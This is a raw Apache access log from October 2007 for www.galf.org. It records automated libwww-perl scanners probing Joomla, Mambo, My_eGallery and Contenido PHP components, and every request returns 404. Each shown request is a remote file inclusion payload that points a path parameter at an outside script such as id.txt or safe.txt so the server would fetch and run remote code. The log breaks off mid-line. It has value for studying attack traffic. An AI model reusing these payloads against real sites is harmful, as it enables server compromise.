217.110.144.106 - - [14/Oct/2007:13:25:24 -0700] "GET /logs//mambots/editors/jce/jscripts/joomla.php?mosConfig_absolute_path=http://www.rcee.pl/administrator/components/com_trash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:13:25:47 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:13:25:47 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.226.79.133 - - [14/Oct/2007:13:25:49 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pinkfloydonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [14/Oct/2007:13:26:03 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pinkfloydonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.177.4.37 - - [14/Oct/2007:13:26:20 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.177.4.37 - - [14/Oct/2007:13:26:21 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.177.4.37 - - [14/Oct/2007:13:26:21 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:13:26:57 -0700] "GET /logs/access_070625.log//mambots/editors/jce/jscripts/joomla.php?mosConfig_absolute_path=http://www.rcee.pl/administrator/components/com_trash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:27:01 -0700] "GET /logs/access_070826.log/contenido/classes/class.inuse.php?cfg[path][contenido]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:27:01 -0700] "GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:13:27:01 -0700] "GET /logs/contenido/classes/class.inuse.php?cfg[path][contenido]=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.113.223.186 - - [14/Oct/2007:13:27:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pinkfloydonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.111.176.90 - - [14/Oct/2007:13:27:20 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [14/Oct/2007:13:27:20 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [14/Oct/2007:13:27:21 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
220.128.138.106 - - [14/Oct/2007:13:27:59 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
220.128.138.106 - - [14/Oct/2007:13:27:59 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.226.79.133 - - [14/Oct/2007:13:28:14 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pinkfloydonline.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
12.22.179.203 - - [14/Oct/2007:13:28:33 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.pinkfloydonline.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.galf.org"
193.142.215.141 - - [14/Oct/2007:13:28:45 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.142.215.141 - - [14/Oct/2007:13:28:46 -0700] "GET //modules/My_eGallery/index.php?basepath=http://us